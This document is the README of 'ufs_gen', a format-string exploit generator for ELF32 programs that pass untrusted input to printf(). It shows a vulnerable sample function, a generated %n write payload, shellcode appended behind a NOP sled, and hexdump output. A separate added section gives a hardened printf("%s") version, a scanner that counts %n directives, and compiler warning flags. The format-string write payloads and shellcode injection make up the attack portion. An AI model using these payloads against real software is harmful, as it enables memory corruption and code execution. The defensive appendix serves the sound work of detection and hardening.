ufs_gen
=======

This software allows you to generate a payload which may override an
address with the value of your choice.

The syntax is quite simple: three parameters are needed for the program
to run correctly.

stackidx: this parameter specifies how many dwords you need to access
          the beginning of your buffer (or payload).
override: the address to override.
with:     the value to inject at the overridden address.

This software is intended to work with an ELF32 generated by a typical
code, for example:

    #include <stdio.h>
    #include <string.h>

    int function(const char *payload)
    {
        char buffer[BUFSIZ];

        strncpy(buffer, payload, sizeof(buffer));
        buffer[sizeof(buffer) - 1] = '\0';
        printf(buffer); /* the payload is used as the format string: this is the bug ufs_gen targets */
        return 0;
    }

Support for ELF64 and other formats is planned but not written yet.
Although the option 'addrsize' can already be used to specify an address
that is not 4 bytes long, there is very little chance that it would work
correctly.

Support for printf(payload) directly (i.e. without a temporary buffer) is
also planned.

We support the options --prefix and --suffix, which respectively prepend
and append their argument to the payload. We also support the option
--sfxnops, which adds n NOP bytes (0x90) between the payload and the
suffix.

Example
=======

    user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
    D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
    user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
    user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
    NOP bytes are at offset 52 (0x34)
    suffix is at offset 152 (0x98)
    00000000  44 33 22 11 45 33 22 11  46 33 22 11 47 33 22 11  |D3".E3".F3".G3".|
    00000010  25 31 32 30 78 25 34 24  6e 25 32 33 39 78 25 35  |%120x%4$n%239x%5|
    00000020  24 6e 25 32 33 39 78 25  36 24 6e 25 32 33 39 78  |$n%239x%6$n%239x|
    00000030  25 37 24 6e 90 90 90 90  90 90 90 90 90 90 90 90  |%7$n............|
    00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
    *
    00000090  90 90 90 90 90 90 90 90  68 2f 73 68 ff fe 44     |........h/sh..D|
    0000009f

The first 52 bytes (0x34) are the payload itself: four addresses
(0x11223344 to 0x11223347, little-endian) followed by the format
directives; the 100 NOP bytes start at offset 52 and the suffix at
offset 152 (0x98), for a total of 159 bytes (0x9f).

License
=======

This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.
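As an added example (not part of ufs_gen or its README), here is the hardened form of the function shown above, where the untrusted payload is passed as an argument to a fixed format string instead of being used as the format, together with a small scanner that counts how many conversion directives, and how many `%n` writes, an input string would carry into printf() if it ever reached a format argument. The scanner and the names function_hardened, count_format_directives and count_write_directives are assumptions made for this example; only the original function() comes from the README.

```c
/* Added example, not part of ufs_gen: hardened variant of the README's
 * function() plus a scanner that counts the format directives an untrusted
 * string would carry into printf() if it were used as the format string.
 * Function names are assumptions made for this example. */
#include <stdio.h>
#include <string.h>

/* Hardened variant: the untrusted data is an argument to a fixed format
 * string, so any '%' sequences in it are printed literally instead of
 * being interpreted, and "%n" can no longer write to memory. */
int function_hardened(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';
    printf("%s", buffer);        /* fputs(buffer, stdout) works as well */
    return 0;
}

/* Count the conversion directives in s, i.e. the '%' sequences printf()
 * would interpret if s were passed as the format string.  "%%" is a
 * literal percent sign and is not counted.  If n_writes is non-NULL it
 * receives the number of "%n" directives, the only ones that write to
 * memory and therefore the ones a detector or test harness cares about. */
size_t count_format_directives(const char *s, size_t *n_writes)
{
    size_t count = 0, writes = 0;
    const char *p;

    for (p = s; *p != '\0'; p++) {
        const char *q;

        if (*p != '%')
            continue;
        if (p[1] == '%') {       /* "%%": literal '%', skip both characters */
            p++;
            continue;
        }
        /* Skip flags, width, precision, the '$' positional index and length
         * modifiers; the first character outside that set is the conversion. */
        q = p + 1;
        while (*q != '\0' && strchr("0123456789.$#-+ 'hlLqjzt", *q) != NULL)
            q++;
        if (*q == '\0')          /* dangling '%' at the end of the string */
            break;
        count++;
        if (*q == 'n')
            writes++;
        p = q;                   /* resume after the conversion character */
    }
    if (n_writes != NULL)
        *n_writes = writes;
    return count;
}

/* Convenience wrapper: number of "%n" directives only. */
size_t count_write_directives(const char *s)
{
    size_t writes = 0;

    count_format_directives(s, &writes);
    return writes;
}

int main(void)
{
    /* Constructed sample: the payload ufs_gen prints in the README example. */
    const char *payload = "D3\"E3\"F3\"G3\"%120x%4$n%239x%5$n%239x%6$n%239x%7$n";
    size_t writes = 0;
    size_t total = count_format_directives(payload, &writes);

    printf("%zu directives, %zu of them %%n writes\n", total, writes);
    function_hardened(payload);  /* prints the payload literally, no writes happen */
    putchar('\n');
    return 0;
}
```

The scanner is the kind of check one puts in a fuzz harness or an input validator for a program that cannot be changed immediately; the real fix is the fixed format string in function_hardened. Building with `-Wformat -Wformat-security` (GCC and Clang) flags a `printf(buffer)` call with a non-literal format at compile time, and `-Werror=format-security` turns it into a build failure.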